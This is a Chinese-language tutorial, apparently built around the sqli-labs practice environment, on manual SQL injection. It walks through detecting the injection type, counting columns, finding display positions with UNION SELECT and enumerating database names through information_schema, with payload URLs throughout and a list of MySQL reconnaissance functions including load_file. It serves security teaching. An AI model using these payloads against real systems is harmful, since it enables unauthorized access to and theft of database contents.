SQL注入详细步骤讲解

SQL注入详细步骤讲解

 

1、Get型 整型与字符型注入判断：

举例:

http://xxx/xxx/Less-1/?id=1 and 1=1 --+ 

输入?id=1 and 1=1 --+正常，输入?id=1 and 1=2 --+报错，可判断为整型注入。

http://xxx.xxx/Less-1/?id=1'   

输入?id=1'出现报错,输入?id=1''正常，可判断为字符型注入。

http://xxx.xxx/Less-1/?id=1' and 1=1 -- -  

输入?id=1' and 1=1 -- -正常，输入?id=1' and 1=2 -- -报错，可判断为字符型注入。

http://xxx/xxx/Less-1/?id=1' and 1=1 --+ 

输入?id=1' and 1=1 --+正常，输入?id=1' and 1=2 --+报错，可判断为字符型注入。

 

总结：--+为注释后面的内容 -- -也可以用，效果一样。单引号是用来猜其是否存在字符型注入的，不加的就是测试其是否是整型注入的。

 

2、判断列数

判断完整型还是字符型后，去判断有多少列，当输入的列数超过它本来的就会出现报错。

举例：id=1' order by 4 --+ 判断这个数据库是否有四列，如果不是会报错，反之不报错。

 

3、判断显示位及在显示位上放一些sql函数来获取你想要知道的。

id改为0或负数或100000这种很大的数，这中不存在的情况就会使其报错，就会直接执行后面的语句。

 

举例：id=0' union select 1,2,3 --+ 判断其中的显示位为哪个，假如是3，那就可在这个位置上加入sql函数来测试。

 MySql的函数有：

1:system_user()  系统用户名

2:user()         用户名

3:current_user   当前用户名

4:session_user()  连接数据库的用户名

5:database()     数据库名

6:version()       MYSQL数据库版本

7:load_file()      转成16进制或者是10进制 MYSQL读取本地文件的函数

8:@@datadir     读取数据库路径

9:@@basedir     MYSQL 安装路径

10:@@version_compile_os     操作系统

 

举例：

1）http://xxx/Less-1/?id=0' union select 1,2,database() --+ 获取当前数据库名。

2）http://xxx/Less-1/?id=0' union select 1,2, group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --+ 

显示所有库名。

group_concat() 是把相同的值全部以逗号分割的形式列出来。